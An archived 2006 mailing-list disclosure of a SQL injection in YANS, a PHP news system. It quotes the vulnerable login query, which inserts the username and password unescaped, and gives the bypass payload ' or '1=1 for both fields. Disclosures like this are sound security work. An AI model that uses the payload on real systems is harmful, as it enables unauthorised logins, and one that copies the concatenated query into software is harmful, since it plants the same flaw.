Y.A.N.S sql injection

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Y.A.N.S sql injection

Subject: Y.A.N.S sql injection
Date: 8 Nov 2006 12:59:34 -0000
From: suppressed

Product: YANS (yet another news system)
Link: http://sourceforge.net/projects/yans/

vuln code:
$resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error());
        
simple sql injection
' or '1=1
' or '1=1

-navairum

Prev by Date: Cisco Security Advisory: Multiple Vulnerabilities in Cisco Secure Desktop
Next by Date: PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities
Previous by thread: Cisco Security Advisory: Multiple Vulnerabilities in Cisco Secure Desktop
Next by thread: PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities
Index(es):
- Date
- Thread

Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.